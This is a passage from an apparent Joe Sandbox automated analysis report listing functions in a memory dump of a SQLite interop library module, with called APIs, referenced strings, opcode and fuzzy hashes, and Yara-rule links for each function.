                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I943321d364f02e5d.
                                                                                      • String ID:
                                                                                      • API String ID: 3215320522-0
                                                                                      • Opcode ID: 6d3a5d363fed98798870d2e645199482c1601043f6f10a51a3051c6df17045b6
                                                                                      • Instruction ID: 528302e21e15b665f5a1b09fcfb37264cb8a83f5fc00f8ede5d81ffe1758ae49
                                                                                      • Opcode Fuzzy Hash: 6d3a5d363fed98798870d2e645199482c1601043f6f10a51a3051c6df17045b6
                                                                                      • Instruction Fuzzy Hash: C941FBB1F043255BDB04DE1DD841A6673A59F8832CF28856FD8285BB81D733D846CB93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4104A0 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _strncpy.LIBCMT ref: 6C4105C3
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,00000000,000000FF,000000FF), ref: 6C4105D7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,000000FF,000000FF), ref: 6C4105DD
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C4105EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9196a02c851acbfb.I943321d364f02e5d.Ifc350ae509dc2b53._strncpy
                                                                                      • String ID:
                                                                                      • API String ID: 2235951870-0
                                                                                      • Opcode ID: 1286eac35c708f3fa2e57813ccfba6df5dd44f9729e1dbebae31758e83237a10
                                                                                      • Instruction ID: 0a77be898092caf8a84a54ad691c381ad97c19cc3ee6a5c8b2c03f62cdc9c2f5
                                                                                      • Opcode Fuzzy Hash: 1286eac35c708f3fa2e57813ccfba6df5dd44f9729e1dbebae31758e83237a10
                                                                                      • Instruction Fuzzy Hash: C2412B3260C2844AC700DE29D880E7AB7959F8533DF24456DE8D98BF51EB31D866C7D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F4DD0 Relevance: 6.2, APIs: 4, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,6C3F4A1B,?,?), ref: 6C3F4E16
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,6C3F4A1B,?,?), ref: 6C3F4E1C
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(00000000,?,00000000,?,?), ref: 6C3F4E99
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(?,?,?), ref: 6C3F4EB8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I46481015c7f49c68.I9c6d7cd7b7d38055.Id99ac2a61d035e11.Iea8388f7613ed158.
                                                                                      • String ID:
                                                                                      • API String ID: 1424557465-0
                                                                                      • Opcode ID: 9cd20aae1c9017a84ffb0e9f16eba3bc3c37e1d8aa18885c3a5a8e6912160903
                                                                                      • Instruction ID: eb2f893a1aa4bfac97cc99a3397b4c13c0ad9d7d4937ecbd8e394005cb5718ae
                                                                                      • Opcode Fuzzy Hash: 9cd20aae1c9017a84ffb0e9f16eba3bc3c37e1d8aa18885c3a5a8e6912160903
                                                                                      • Instruction Fuzzy Hash: 9851E875E00204AFDB01CF58D980E9E77B6EF80328F1589ADE829A7751E731DA06CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C431CC0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?), ref: 6C431D48
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?), ref: 6C431D70
                                                                                      • SId6deafdcc0c75049.SQLITE.INTEROP(?,00000002,00000000,?,?,?,00000001,?,?,?,?,?,?,?), ref: 6C431D82
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C431D8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I46481015c7f49c68.I9c6d7cd7b7d38055.Id6deafdcc0c75049.Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 2558901508-0
                                                                                      • Opcode ID: 497db528d189aec8739864bd6568af4ff9c2f65352b93809d7bd0e6dcd4982df
                                                                                      • Instruction ID: 500a2b4f140df07486afc7ea2a95dd2f9f566aad99481380fc14819a36f4f187
                                                                                      • Opcode Fuzzy Hash: 497db528d189aec8739864bd6568af4ff9c2f65352b93809d7bd0e6dcd4982df
                                                                                      • Instruction Fuzzy Hash: 3B2106B2B043155BE700DA25AC41EDBB7E8DFC8269F00053DF94D92741EB31E91887E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F49D0 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(00000000,00000001,?,?), ref: 6C3F4A49
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,00000000,00000001,?,?), ref: 6C3F4A4F
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(00000000,00000001,?,?), ref: 6C3F4A8F
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,00000000,00000001,?,?), ref: 6C3F4A95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.
                                                                                      • String ID:
                                                                                      • API String ID: 1466908741-0
                                                                                      • Opcode ID: b32a0f35f78840ad2306c7877ed0415362442645c2a59990ca9d5d215ab0641d
                                                                                      • Instruction ID: 759ff130339da3f95a7a3915e586b9b005431dabd79b8f502b72208dc91f8524
                                                                                      • Opcode Fuzzy Hash: b32a0f35f78840ad2306c7877ed0415362442645c2a59990ca9d5d215ab0641d
                                                                                      • Instruction Fuzzy Hash: 63219C75A01504ABDF01CA12DD80FCFBA79AF4435CF084564EC18B2B41F732AB5A8BE6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C436C20 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,000000FF), ref: 6C436C44
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(000000FF,?,?,000000FF), ref: 6C436C61
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C436C79
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C436C91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9196a02c851acbfb.Icd6b4ac0aeff7202.
                                                                                      • String ID:
                                                                                      • API String ID: 2644906834-0
                                                                                      • Opcode ID: 4892536bdf16637be84d7dd950d6d729a31411ed5aee65a5857c6d46ac11d5de
                                                                                      • Instruction ID: b00730fe76bd347939f13172d55c642118328fe940e9b4539ccc28bfaa18be2a
                                                                                      • Opcode Fuzzy Hash: 4892536bdf16637be84d7dd950d6d729a31411ed5aee65a5857c6d46ac11d5de
                                                                                      • Instruction Fuzzy Hash: 5B214276614018AFCF00DFA8EC41CD577A9EB49239B248399FD2CC77A1E632D92197D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D8EAD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6C3D8E54,?,00000001,00000000,?,?,6C3D933A,00000008,GetCurrentPackageId), ref: 6C3D8EDF
                                                                                      • GetLastError.KERNEL32(?,6C3D8E54,?,00000001,00000000,?,?,6C3D933A,00000008,GetCurrentPackageId,6C4E9728,GetCurrentPackageId,00000000), ref: 6C3D8EEB
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6C3D8E54,?,00000001,00000000,?,?,6C3D933A,00000008,GetCurrentPackageId,6C4E9728,GetCurrentPackageId,00000000), ref: 6C3D8EF9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: eca63915ae7e269d9b4ae501f0fb9cb4a6dc8807e6b3e6e7ca106e2de301dd50
                                                                                      • Instruction ID: 734d6d092a93853985bca26d40833544b479a77ec96009e07ef1b9d219283c0f
                                                                                      • Opcode Fuzzy Hash: eca63915ae7e269d9b4ae501f0fb9cb4a6dc8807e6b3e6e7ca106e2de301dd50
                                                                                      • Instruction Fuzzy Hash: BA01473374A2229BCF509B6DAC44B467BBDAF4AB657170622F805D7540C721F400CEE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3FA930 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,6C3F935A), ref: 6C3FA9A3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,6C3F935A), ref: 6C3FA9AC
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,6C3F935A), ref: 6C3FA9B7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,6C3F935A), ref: 6C3FA9C0
                                                                                        • Part of subcall function 6C4030B0: SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,00000000,?,?,6C3FB3C6,?,FFFFFFFF), ref: 6C40314C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 07b233349a4ad3fd0b015e3e5b55d0cc394fe6fcce87b88e0e53af83a0be9b12
                                                                                      • Instruction ID: 84e7439e77f4ede097d111356070289f625afbf909c25b9f6e51eaa62185d551
                                                                                      • Opcode Fuzzy Hash: 07b233349a4ad3fd0b015e3e5b55d0cc394fe6fcce87b88e0e53af83a0be9b12
                                                                                      • Instruction Fuzzy Hash: 0601B5B6901A116BE7159720FD02DAF7A626F4051CB05043CD85761F22EB23F52D9AD3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EAE30 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,6C3EA486), ref: 6C3EAE36
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(6C3EA486,?,?,6C3EA486), ref: 6C3EAE3E
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(6C3EA486,6C3EA486,?,?,6C3EA486), ref: 6C3EAE46
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,6C3EA486), ref: 6C3EAE63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: d11b31db2cf3db4b0cec22ef3f6ee077f8439f4557d61756ab5ca592d6ebe7aa
                                                                                      • Instruction ID: 3e32abb1cd8fa79461484b77aa89b924ebbc698b431876c9ecc19f1e51e9dcad
                                                                                      • Opcode Fuzzy Hash: d11b31db2cf3db4b0cec22ef3f6ee077f8439f4557d61756ab5ca592d6ebe7aa
                                                                                      • Instruction Fuzzy Hash: 98F062B1011B108BE7319F11D518B9BBAF0BF08319F014A0CD4860AEA1C7BAB55D8BC4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D2706 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6C3D2706
                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6C3D270B
                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6C3D2710
                                                                                        • Part of subcall function 6C3D2B80: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6C3D2B91
                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6C3D2725
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                      • String ID:
                                                                                      • API String ID: 1761009282-0
                                                                                      • Opcode ID: cff6271ce2fcaee87cb2561fe6ffc52cce4b05a4d107bfcd4f74eb29c87db949
                                                                                      • Instruction ID: f51a914c1e95a91d26de353720d3eca93572fcb1791134e6eb23561e2106683e
                                                                                      • Opcode Fuzzy Hash: cff6271ce2fcaee87cb2561fe6ffc52cce4b05a4d107bfcd4f74eb29c87db949
                                                                                      • Instruction Fuzzy Hash: ABC00227448343945C622EB2631C1DA03101F926DC78B25C9D8C417F025B873C0F6D33
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E6440 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3E67E7
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3E6840
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: 0
                                                                                      • API String ID: 885266447-4108050209
                                                                                      • Opcode ID: 01709d5722701e296fc71f8dc4c0d4588be0feb36d299d140288ab15b3b4a313
                                                                                      • Instruction ID: f98a9c611dcb6bcc4c0a50af2281c018dc97468b0e7d854dafb526f71bca126e
                                                                                      • Opcode Fuzzy Hash: 01709d5722701e296fc71f8dc4c0d4588be0feb36d299d140288ab15b3b4a313
                                                                                      • Instruction Fuzzy Hash: C3F1E0B1A087298BCB14CE18C49035AB7F5BBCD348F551A2FE695DBA90D7718486CF83
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C484F00 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,6C482BC2,?,?,?,?,?,?), ref: 6C4851AB
                                                                                      Strings
                                                                                      • BINARY, xrefs: 6C48505D
                                                                                      • foreign key mismatch - "%w" referencing "%w", xrefs: 6C485127
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: BINARY$foreign key mismatch - "%w" referencing "%w"
                                                                                      • API String ID: 223094752-2514301570
                                                                                      • Opcode ID: 05020e3364f22c6a2f236cc2c646ad4c204e19a1a34e3bcb930bc2d598719a10
                                                                                      • Instruction ID: b6a9697d955c7c1fda31d4e8e0e1703662f5eabc4310b304db90fc5903a7cb8c
                                                                                      • Opcode Fuzzy Hash: 05020e3364f22c6a2f236cc2c646ad4c204e19a1a34e3bcb930bc2d598719a10
                                                                                      • Instruction Fuzzy Hash: 8891C235E062158FEB11CF59C490FA9B7B1FF89319F2441ADD85AABB41D732E842CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D0380 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4D03B6
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4D04C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: 2mLl
                                                                                      • API String ID: 885266447-597793343
                                                                                      • Opcode ID: c9da24703d6f8c99ce97f1f24995d5a8aca401d420ab981e2d6384bb0d8eb944
                                                                                      • Instruction ID: 5659ba06508f4858e7f59c01a7e9930c61b71982deef4c39929879ebf8eb4f86
                                                                                      • Opcode Fuzzy Hash: c9da24703d6f8c99ce97f1f24995d5a8aca401d420ab981e2d6384bb0d8eb944
                                                                                      • Instruction Fuzzy Hash: 9F71A0716183418FD704DF28C860F5ABBE5BF88318F164A6DEC989B752E730E945CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43EDC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?), ref: 6C43EDFE
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,00000000), ref: 6C43EE1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1527d54f96ad891e.Icd6b4ac0aeff7202.
                                                                                      • String ID: fts3cursor
                                                                                      • API String ID: 1549334405-1574267913
                                                                                      • Opcode ID: 607826270fefd51ceeeb31d5a1c401007d69e5220bbafd8682afb21a7711805e
                                                                                      • Instruction ID: d483ec8299e7fcd0adfda8d5f7938b40e356e335510011937159414196f27ff8
                                                                                      • Opcode Fuzzy Hash: 607826270fefd51ceeeb31d5a1c401007d69e5220bbafd8682afb21a7711805e
                                                                                      • Instruction Fuzzy Hash: 7641B4727012159BD714DF2AE881E66B3A4EB8822AF14867EE91CC7B90D731DC55C7D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3DE600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
